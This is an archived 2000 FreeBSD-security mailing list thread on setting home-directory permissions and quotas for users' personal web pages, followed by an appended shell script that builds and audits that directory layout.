* GPG fingerprint - A9BC F3A8 278E 22F2 9BDA BFCF 74C3 2D31 C035 5390 *

From owner-freebsd-security  Fri Sep  8 15:19:49 2000
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 970A737B509 for ; Fri, 8 Sep 2000 15:19:46 -0700 (PDT)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id QAA11131; Fri, 8 Sep 2000 16:19:25 -0600 (MDT)
Message-Id: <4.3.2.7.2.20000908161720.04680100@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Fri, 08 Sep 2000 16:19:22 -0600
To: "Jonathan M. Slivko", freebsd-security@FreeBSD.ORG
From: Brett Glass
Subject: Re: Home Directories -- in the point of security?
In-Reply-To:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Symlink a ~/Web subdirectory into the user's directory and make that one
world-readable. If updating Web pages is the only reason users use FTP,
chroot them into their Web directories when they connect via FTP. Put
quotas on the Web subdirectories, too. Some folks don't realize just
how big their uncompressed (or badly compressed) images are.

--Brett

At 03:12 PM 9/8/2000, Jonathan M. Slivko wrote:

>What chmod value should I use when modifying home directories to allow for
>a personal website on a webserver without compromising security of the
>files from other users, even reading the files is out of the question
>entirely.
>
>----
>Jonathan M. Slivko
>Technical Support: CoreSync Corporation
>NSI ID: JSR730
>
>Want a reliable shell? check us out at
>http://www.coresync.net!
>----

From owner-freebsd-security  Fri Sep  8 15:21:52 2000
Delivered-To: freebsd-security@freebsd.org
Received: from rocket.coresync.net (ns1.coresync.net [64.71.131.2]) by hub.freebsd.org (Postfix) with SMTP id 95F5737B50F for ; Fri, 8 Sep 2000 15:21:49 -0700 (PDT)
Received: (qmail 1290 invoked by uid 1117); 8 Sep 2000 22:12:52 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 8 Sep 2000 22:12:52 -0000
Date: Fri, 8 Sep 2000 15:12:52 -0700 (PDT)
From: "Jonathan M. Slivko"
To: Brett Glass
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Home Directories -- in the point of security?
In-Reply-To: <4.3.2.7.2.20000908161720.04680100@localhost>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Well, I'm not running this box as an ISP. I'm running this as a box for
myself and a few of my friends. So, I have more than enough space to run
all of what I need without having to put quotas on anything.

-- Jonathan M. Slivko

----
Jonathan M. Slivko
Technical Support: CoreSync Corporation
NSI ID: JSR730

Want a reliable shell? check us out at
http://www.coresync.net!
----

On Fri, 8 Sep 2000, Brett Glass wrote:

> Symlink a ~/Web subdirectory into the user's directory and make that one
> world-readable. If updating Web pages is the only reason users use FTP,
> chroot them into their Web directories when they connect via FTP. Put
> quotas on the Web subdirectories, too. Some folks don't realize just
> how big their uncompressed (or badly compressed) images are.
>
> --Brett
>
> At 03:12 PM 9/8/2000, Jonathan M. Slivko wrote:
>
> >What chmod value should I use when modifying home directories to allow for
> >a personal website on a webserver without compromising security of the
> >files from other users, even reading the files is out of the question
> >entirely.
> >
> >----
> >Jonathan M. Slivko
> >Technical Support: CoreSync Corporation
> >NSI ID: JSR730
> >
> >Want a reliable shell? check us out at
> >http://www.coresync.net!
> >---- > > > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 15:31:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 445DF37B43F for ; Fri, 8 Sep 2000 15:31:41 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id QAA11248; Fri, 8 Sep 2000 16:31:33 -0600 (MDT) Message-Id: <4.3.2.7.2.20000908162832.04cff4c0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Fri, 08 Sep 2000 16:31:26 -0600 To: "Jonathan M. Slivko" 
From: Brett Glass Subject: Re: Home Directories -- in the point of security? Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: <4.3.2.7.2.20000908161720.04680100@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Even "friends" can sometimes overdo it. If you keep the pages in a separate FreeBSD partition and impose quotas, you'll be safer in that the system (which may be mission-critical for you) won't fall apart if someone inadvertently takes up a lot of space. This is especially important if you're letting your friends do CGI. --Brett At 04:12 PM 9/8/2000, Jonathan M. Slivko wrote: >Well, i'm not running this box as an ISP. I'm running this as a box for >myself and a few of my friends. So, I have more than enough space to run >all of what I need without having to put quotas on anything. > >-- Jonathan M. Slivko > >---- >Jonathan M. Slivko >Technical Support: CoreSync Corparation >NSI ID: JSR730 > >Want a reliable shells? check us out at >http://www.coresync.net! >---- > >On Fri, 8 Sep 2000, Brett Glass wrote: > >> Symlink a ~/Web subdirectory into the user's directory and make that one >> world-readable. If updating Web pages is the only reason users use FTP, >> chroot them into their Web directories when they connect via FTP. Put >> quotas on the Web subdirectories, too. Some folks don't realize just >> how big their uncompressed (or badly compressed) images are. >> >> --Brett >> >> At 03:12 PM 9/8/2000, Jonathan M. Slivko wrote: >> >> >What chmod value should I use when modifying home directories to allow for >> >a personal website on a webserver without comprimsing security of the >> >files from other users, even reading the files is out of the question >> >entirely. >> > >> >---- >> >Jonathan M. Slivko >> >Technical Support: CoreSync Corparation >> >NSI ID: JSR730 >> > >> >Want a reliable shells? check us out at >> >http://www.coresync.net! 
>> >---- >> > >> > >> > >> >To Unsubscribe: send mail to majordomo@FreeBSD.org >> >with "unsubscribe freebsd-security" in the body of the message >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 8 15:39:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from shell.futuresouth.com (shell.futuresouth.com [198.78.58.28]) by hub.freebsd.org (Postfix) with ESMTP id 2B45537B507 for ; Fri, 8 Sep 2000 15:39:28 -0700 (PDT) Received: (from fullermd@localhost) by shell.futuresouth.com (8.9.3/8.9.3) id RAA10878; Fri, 8 Sep 2000 17:39:19 -0500 (CDT) Date: Fri, 8 Sep 2000 17:39:18 -0500 
From: "Matthew D. Fuller" To: Brett Glass Cc: "Jonathan M. Slivko" , freebsd-security@FreeBSD.ORG Subject: Re: Home Directories -- in the point of security? Message-ID: <20000908173918.D9652@futuresouth.com> References: <4.3.2.7.2.20000908161720.04680100@localhost> <4.3.2.7.2.20000908162832.04cff4c0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4.3.2.7.2.20000908162832.04cff4c0@localhost>; from brett@lariat.org on Fri, Sep 08, 2000 at 04:31:26PM -0600 X-OS: FreeBSD Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Sep 08, 2000 at 04:31:26PM -0600, a little birdie told me that Brett Glass remarked > Even "friends" can sometimes overdo it. If you keep the pages in a > separate FreeBSD partition and impose quotas, you'll be safer in > that the system (which may be mission-critical for you) won't fall > apart if someone inadvertently takes up a lot of space. This is > especially important if you're letting your friends do CGI. Let friends alone :P Friends are easy. Friends are friendly. Friends know you know where they live. Friends know you're insane and if they putz up your box, they know to already have the flight out of the country scheduled. -- Matthew Fuller (MF4839) | fullermd@over-yonder.net Unix Systems Administrator | fullermd@futuresouth.com Specializing in FreeBSD | http://www.over-yonder.net/ "The only reason I'm burning my candle at both ends, is because I haven't figured out how to light the middle yet" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
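The chmod layout Brett recommends earlier in the thread (a home directory others can traverse but not read, with a world-readable web directory on a separate, quota-enforced partition linked in as ~/Web), written out as an added example that is not part of the original thread. WEBROOT, HOMEROOT and the user name "demo" are hypothetical values for the demonstration; the audit function is a constructed check, not a FreeBSD tool.

```shell
#!/bin/sh
# Added example, not from the thread: lay out a per-user web directory as
# Brett describes and audit the resulting modes.
# Hypothetical layout: $WEBROOT is the separate partition where quotas are
# enforced; $HOMEROOT holds the home directories. Demo defaults use /tmp.
set -eu

WEBROOT="${WEBROOT:-${TMPDIR:-/tmp}/demo-web}"
HOMEROOT="${HOMEROOT:-${TMPDIR:-/tmp}/demo-home}"

# Symbolic mode string ("drwx--x--x") of a path. ls -ld prints the same
# shape on GNU and BSD systems, unlike the flags of stat(1).
mode_of() {
    ls -ld "$1" | cut -c1-10
}

# ~user gets 0711: others may traverse it (the httpd must reach ~/Web) but
# can neither list nor read it. $WEBROOT/user gets 0755 so it can be served,
# and is then linked into the home as ~/Web.
setup_user_web() {
    user=$1
    home="$HOMEROOT/$user"
    web="$WEBROOT/$user"
    mkdir -p "$home" "$web"
    chmod 0711 "$home"
    chmod 0755 "$web"
    ln -sfn "$web" "$home/Web"
}

# Audit one user. Succeeds only if the home denies read and write to
# "others" (characters 8 and 9 of the mode string), the web directory
# grants others r-x, and ~/Web is a symlink pointing at the web directory.
check_user_web() {
    user=$1
    home="$HOMEROOT/$user"
    web="$WEBROOT/$user"
    case "$(mode_of "$home")" in
        d??????--?) ;;
        *) echo "$home: readable or writable by others" >&2; return 1 ;;
    esac
    case "$(mode_of "$web")" in
        d??????r-x) ;;
        *) echo "$web: not world-readable and traversable" >&2; return 1 ;;
    esac
    if ! [ -L "$home/Web" ] || [ "$(readlink "$home/Web")" != "$web" ]; then
        echo "$home/Web: not a symlink to $web" >&2; return 1
    fi
    return 0
}

setup_user_web demo && check_user_web demo && echo "demo layout OK"
```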